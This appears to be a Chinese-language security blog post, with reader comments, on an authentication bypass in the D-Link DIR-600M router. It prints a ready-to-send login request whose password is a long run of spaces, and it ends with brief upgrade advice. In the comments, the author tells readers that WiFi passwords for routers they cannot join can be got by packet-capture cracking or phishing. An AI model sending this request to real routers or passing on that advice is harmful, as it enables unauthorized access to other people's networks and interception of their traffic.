«

D-Link DIR-600M 150M无线路由器的认证绕过

时间:2017-5-22 10:29     作者:admin     分类: 网络安全

我只需要连接上路由器,然后查看路由器的网关地址,在浏览器打开网关地址,输入用户名admin,密码输入超过20个空格 即可成功绕过认证,进入路由管理后台.

PS:路由器固件是3.04.需要路由器为默认设置,没有修改用户名和设置特地IP才能访问管理界面.

如果你的路由器开放了广域网访问,那将很危险的.任何人都可以进入你得路由器.嗅探,窃听你得网络流量.

整个请求看起来应该类似这样的:

—————–ATTACKER REQUEST———————————–

POST /login.cgi HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101
Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.1/login.htm
Cookie: SessionID=
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

username=Admin&password=+++++++++++++++++++++++

++++++++++++++++++++++++++++++++++++++++++

++++++++++++++++++++++++++++++&submit.htm%3Flogin.htm=Send

——————–END here————————

下面附上视频链接:

1.https://www.youtube.com/watch?v=waIJKWCpyNQring

2.https://pan.lanzou.com/1171760

如果你有使用这个型号的路由器,请尽快升级,或者是设置值只能是局域网特定IP才能访问管理界面(需要配合静态路由功能设置).

标签: 路由器 攻击 认证绕过

版权所有:Mrxn's Blog
文章标题:D-Link DIR-600M 150M无线路由器的认证绕过
除非注明,文章均为 Mrxn's Blog 原创,请勿用于任何商业用途,转载请注明作者和出处 Mrxn's Blog
扫描二维码,在手机上阅读
评论:
avatar
2021-06-21 16:33
密码怎样才能获取到呢
commentator
Mrxn 2021-09-11 13:10
@宇: 抓包破解 或者钓鱼
avatar
旧日的足 2018-02-20 09:51
这个可以,我家就是用的WEB认证..没有设置密码,磊科的256P  请问也适用?
commentator
Mrxn 2018-02-20 21:13
@旧日的足:不知道 没有用过。。。
avatar
baozi 2017-12-15 10:45
求教,在没有网线和WiFi密码的情况下得怎么样才能连接上路由器。一直想不通 开头的只要连接上路由器
commentator
Mrxn 2017-12-15 11:37
@baozi:WiFi密码可以很容易搞到吧。。。
avatar
Flyer 2017-05-24 06:01
又学了一招
commentator
Mrxn 2017-09-17 19:21
@Flyer:哈哈